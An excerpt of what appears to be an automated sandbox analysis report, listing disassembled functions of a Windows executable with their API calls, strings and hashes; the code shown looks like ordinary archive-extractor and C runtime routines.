                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberSpecificWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 3464475507-439456425
                                                                                              • Opcode ID: bba381b37d52b3b4d69d10d07c217a68aca1a6ece90a5a3a7cd72c025bb8faf8
                                                                                              • Instruction ID: 41693c64837133dbe57697bdd85d41e87222ea52be2165c432327aad2dfb9e39
                                                                                              • Opcode Fuzzy Hash: bba381b37d52b3b4d69d10d07c217a68aca1a6ece90a5a3a7cd72c025bb8faf8
                                                                                              • Instruction Fuzzy Hash: 3771E5725483147BE233AB64EC49FFF77ACEB8A700F410819F64DD6091DBB1A9448B62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00330A0A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00330A16
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00330AE2
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00330B02
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00330B0C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 1bfc1ed0a8bed2dbe56eb8e6a072415302e5e6cfbd0ee7e20904a84b86adf9ec
                                                                                              • Instruction ID: c7997bbf190ca2a4b253ff7193ed77d00fb9efbbe5d85fbda27def347df89f49
                                                                                              • Opcode Fuzzy Hash: 1bfc1ed0a8bed2dbe56eb8e6a072415302e5e6cfbd0ee7e20904a84b86adf9ec
                                                                                              • Instruction Fuzzy Hash: 2D3129B5D0521C9BDB21DFA4DD897CDBBB8BF08304F1041AAE40DAB250EB759A84CF44
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032D884 Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 428windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0032D889
                                                                                                • Part of subcall function 0032C504: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0032C5EB
                                                                                              • _wcslen.LIBCMT ref: 0032DB4F
                                                                                              • _wcslen.LIBCMT ref: 0032DB58
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0032DBB6
                                                                                              • _wcslen.LIBCMT ref: 0032DBF8
                                                                                              • _wcsrchr.LIBVCRUNTIME ref: 0032DD40
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0032DD7B
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0032DD8B
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,0036389A), ref: 0032DD99
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0032DDC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                              • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                              • API String ID: 2804936435-312220925
                                                                                              • Opcode ID: 220a57ea868a1f8b2897dda7cd0c3d39565b8716bf8c071c3e341fa17dfe1a47
                                                                                              • Instruction ID: 97c4309b4624e9331e22a6fde16e0d99f28f31b5fbdcbe418b98c5d632615fd0
                                                                                              • Opcode Fuzzy Hash: 220a57ea868a1f8b2897dda7cd0c3d39565b8716bf8c071c3e341fa17dfe1a47
                                                                                              • Instruction Fuzzy Hash: E2E16672900128AADF26DBA4ED85EEE73BCEF05710F5540A6F609E7054EF749E84CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00317AAF Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 337fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00317AB4
                                                                                              • _wcslen.LIBCMT ref: 00317B1D
                                                                                              • _wcslen.LIBCMT ref: 00317B8E
                                                                                                • Part of subcall function 00318704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00318713
                                                                                                • Part of subcall function 00318704: OpenProcessToken.ADVAPI32(00000000), ref: 0031871A
                                                                                                • Part of subcall function 00318704: GetLastError.KERNEL32 ref: 00318759
                                                                                                • Part of subcall function 00318704: CloseHandle.KERNEL32(?), ref: 00318768
                                                                                                • Part of subcall function 0031B470: DeleteFileW.KERNELBASE(?,00000000,?,0031A438,?,?,?,?,0031892B,?,?,?,0034380F,000000FF), ref: 0031B481
                                                                                                • Part of subcall function 0031B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,0031A438,?,?,?,?,0031892B,?,?,?,0034380F,000000FF), ref: 0031B4AF
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00317C43
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00317C5F
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00317DAB
                                                                                                • Part of subcall function 0031B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00317ED0,?,?,?,00000000), ref: 0031B04C
                                                                                                • Part of subcall function 0031B032: SetFileTime.KERNELBASE(?,?,?,?), ref: 0031B100
                                                                                                • Part of subcall function 0031A880: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0031A83D,?,?,?,?,?,0034380F,000000FF), ref: 0031A89B
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B8FA
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B92B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Close$AttributesCreateDeleteHandleProcess_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationOpenTimeToken
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 1504485742-3508440684
                                                                                              • Opcode ID: 0d91958e13cb59c48629954ec74f891d0eea01efe62dbd63305dd2d0d633207f
                                                                                              • Instruction ID: c8e203639ee71f78b7f3a6b2d54f6cd9c21ab2a0dd9abd60e7fdd00724479126
                                                                                              • Opcode Fuzzy Hash: 0d91958e13cb59c48629954ec74f891d0eea01efe62dbd63305dd2d0d633207f
                                                                                              • Instruction Fuzzy Hash: F4C1B775904209AEDB2BDB64CC86FEEB7BCAF08310F054565F545EB181DB34EA84CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031F608 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 0031F62E
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                                • Part of subcall function 003230F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00353070,00000200,0031EC48,00000000,?,00000050,00353070), ref: 00323112
                                                                                              • _strlen.LIBCMT ref: 0031F64F
                                                                                              • SetDlgItemTextW.USER32(?,00350274,?), ref: 0031F6AF
                                                                                              • GetWindowRect.USER32(?,?), ref: 0031F6E9
                                                                                              • GetClientRect.USER32(?,?), ref: 0031F6F5
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0031F795
                                                                                              • GetWindowRect.USER32(?,?), ref: 0031F7C2
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0031F7FB
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 0031F803
                                                                                              • GetWindow.USER32(?,00000005), ref: 0031F80E
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0031F83B
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0031F8AD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                              • String ID: $%s:$CAPTION$d
                                                                                              • API String ID: 2407758923-2512411981
                                                                                              • Opcode ID: 0628dad87f6b2f855842c35017d6f3ace98a6554ffd8938066f1acdb6b36e2ed
                                                                                              • Instruction ID: e26626aaeda2c95029a34adc57c498c0b062be449c1e76ea319047b92bfdd43f
                                                                                              • Opcode Fuzzy Hash: 0628dad87f6b2f855842c35017d6f3ace98a6554ffd8938066f1acdb6b36e2ed
                                                                                              • Instruction Fuzzy Hash: 5381C2722083019FD716DF68CD89FAFBBE8EB88704F04092DF985D7290D671E8458B52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033DCE2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0033DD26
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D8DE
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D8F0
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D902
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D914
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D926
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D938
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D94A
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D95C
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D96E
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D980
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D992
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D9A4
                                                                                                • Part of subcall function 0033D8C1: _free.LIBCMT ref: 0033D9B6
                                                                                              • _free.LIBCMT ref: 0033DD1B
                                                                                                • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
                                                                                                • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
                                                                                              • _free.LIBCMT ref: 0033DD3D
                                                                                              • _free.LIBCMT ref: 0033DD52
                                                                                              • _free.LIBCMT ref: 0033DD5D
                                                                                              • _free.LIBCMT ref: 0033DD7F
                                                                                              • _free.LIBCMT ref: 0033DD92
                                                                                              • _free.LIBCMT ref: 0033DDA0
                                                                                              • _free.LIBCMT ref: 0033DDAB
                                                                                              • _free.LIBCMT ref: 0033DDE3
                                                                                              • _free.LIBCMT ref: 0033DDEA
                                                                                              • _free.LIBCMT ref: 0033DE07
                                                                                              • _free.LIBCMT ref: 0033DE1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID: h5
                                                                                              • API String ID: 161543041-1056193760
                                                                                              • Opcode ID: 79b11954905930149f28d4258081330c4aee0b8516f5918b89fafde5a07dc1ea
                                                                                              • Instruction ID: 12b42db9fad93f94404b208b8bd57cef4b081d3c51c9bee26021fbb8dd191b29
                                                                                              • Opcode Fuzzy Hash: 79b11954905930149f28d4258081330c4aee0b8516f5918b89fafde5a07dc1ea
                                                                                              • Instruction Fuzzy Hash: 2E3157316047009FEB22AA39EC86F5AB7E9FF10710F194829E489DB161DF31AC80CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032E7EE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindow.USER32(?,00000005), ref: 0032E811
                                                                                              • GetClassNameW.USER32(00000000,?,00000800), ref: 0032E83D
                                                                                                • Part of subcall function 00323316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,0031D523,00000000,.exe,?,?,00000800,?,?,?,00329E5C), ref: 0032332C
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0032E859
                                                                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0032E870
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0032E884
                                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0032E8AD
                                                                                              • DeleteObject.GDI32(00000000), ref: 0032E8B4
                                                                                              • GetWindow.USER32(00000000,00000002), ref: 0032E8BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                              • String ID: STATIC
                                                                                              • API String ID: 3820355801-1882779555
                                                                                              • Opcode ID: 2d969724d74397e9f4daf3203400ce415d7345ddd3fa6e9a1ef0154f34b40eac
                                                                                              • Instruction ID: 52ecc915bb1a56ae3b303e9ddf5712d59ad7e9e9d54fdacd3eaf0834970accfc
                                                                                              • Opcode Fuzzy Hash: 2d969724d74397e9f4daf3203400ce415d7345ddd3fa6e9a1ef0154f34b40eac
                                                                                              • Instruction Fuzzy Hash: BF112132500B207BEA336BB0BC0AFAF779CAF00B11F410434FA95A90D2DBA48D4586A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033A421 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 0033A435
                                                                                                • Part of subcall function 0033A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?), ref: 0033A680
                                                                                                • Part of subcall function 0033A66A: GetLastError.KERNEL32(?,?,0033DA56,?,00000000,?,00000000,?,0033DA7D,?,00000007,?,?,0033DE7A,?,?), ref: 0033A692
                                                                                              • _free.LIBCMT ref: 0033A441
                                                                                              • _free.LIBCMT ref: 0033A44C
                                                                                              • _free.LIBCMT ref: 0033A457
                                                                                              • _free.LIBCMT ref: 0033A462
                                                                                              • _free.LIBCMT ref: 0033A46D
                                                                                              • _free.LIBCMT ref: 0033A478
                                                                                              • _free.LIBCMT ref: 0033A483
                                                                                              • _free.LIBCMT ref: 0033A48E
                                                                                              • _free.LIBCMT ref: 0033A49C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 3b12f5959b20c32ca6874b8646a1b63990b85323bafffb201ff4be2a3e47c924
                                                                                              • Instruction ID: 98fc258c38f4639b6e5058fda9189a6534770d082f2be0e13d45ac83e0a6ab95
                                                                                              • Opcode Fuzzy Hash: 3b12f5959b20c32ca6874b8646a1b63990b85323bafffb201ff4be2a3e47c924
                                                                                              • Instruction Fuzzy Hash: FF11B676210508BFCB02EF54CC92CD93BB5EF14750F4581A5FA488F232DA31EE519B81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00333FC1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 322700389-393685449
                                                                                              • Opcode ID: 13c42c48653b20e183d2805ae932bcd74a9eab6c249c41290ffc03f307b25d08
                                                                                              • Instruction ID: e8d3b4e972fccc476ceb2ef478db4748e84c0f406b5c7fd232e636e92d1a5243
                                                                                              • Opcode Fuzzy Hash: 13c42c48653b20e183d2805ae932bcd74a9eab6c249c41290ffc03f307b25d08
                                                                                              • Instruction Fuzzy Hash: 81B17C75900209EFCF1ADFA4C8C19AEBBB5FF14310F16855AF811AB212D735EA61CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032A6D1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0032A6F6
                                                                                              • _wcslen.LIBCMT ref: 0032A796
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0032A7A5
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0032A7C6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$AllocByteCharGlobalMultiWide
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 1116704506-4209811716
                                                                                              • Opcode ID: e59e101087baee2de855bdc9b008e6b0fa26f047585307942d18c85b144e3262
                                                                                              • Instruction ID: 6f85ac2ad8931030c8ff3a1c491270249cd1ced039f74216a6cc93c1ce681341
                                                                                              • Opcode Fuzzy Hash: e59e101087baee2de855bdc9b008e6b0fa26f047585307942d18c85b144e3262
                                                                                              • Instruction Fuzzy Hash: 25312C32104B217FE727ABA4AC46F6F7BACDF42710F15011EF5019E1D2EF64A94583AA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032C7B0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                                • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032C800
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0032C827
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0032C840
                                                                                              • SetWindowTextW.USER32(?,?), ref: 0032C851
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 0032C85A
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0032C86E
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0032C884
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                              • String ID: LICENSEDLG
                                                                                              • API String ID: 3214253823-2177901306
                                                                                              • Opcode ID: 3b48c3adb836fca56b20ad2fb3e437f3f5abd529a059ed22fa3176c69cddf66a
                                                                                              • Instruction ID: 8ee08979ead4a2b9a022ff7954d8dbbc31bca311dfcdf8db5b2a3ab706558d00
                                                                                              • Opcode Fuzzy Hash: 3b48c3adb836fca56b20ad2fb3e437f3f5abd529a059ed22fa3176c69cddf66a
                                                                                              • Instruction Fuzzy Hash: 0121F9321602117BE6375F69FC49F7F3BACEB46B85F014418F205E60A0CBA29D419671
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031B5D6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0031B5E2
                                                                                                • Part of subcall function 00322701: GetSystemTime.KERNEL32(?), ref: 0032270F
                                                                                                • Part of subcall function 00322701: SystemTimeToFileTime.KERNEL32(?,?), ref: 0032271D
                                                                                                • Part of subcall function 003226AA: __aulldiv.LIBCMT ref: 003226B3
                                                                                              • __aulldiv.LIBCMT ref: 0031B60E
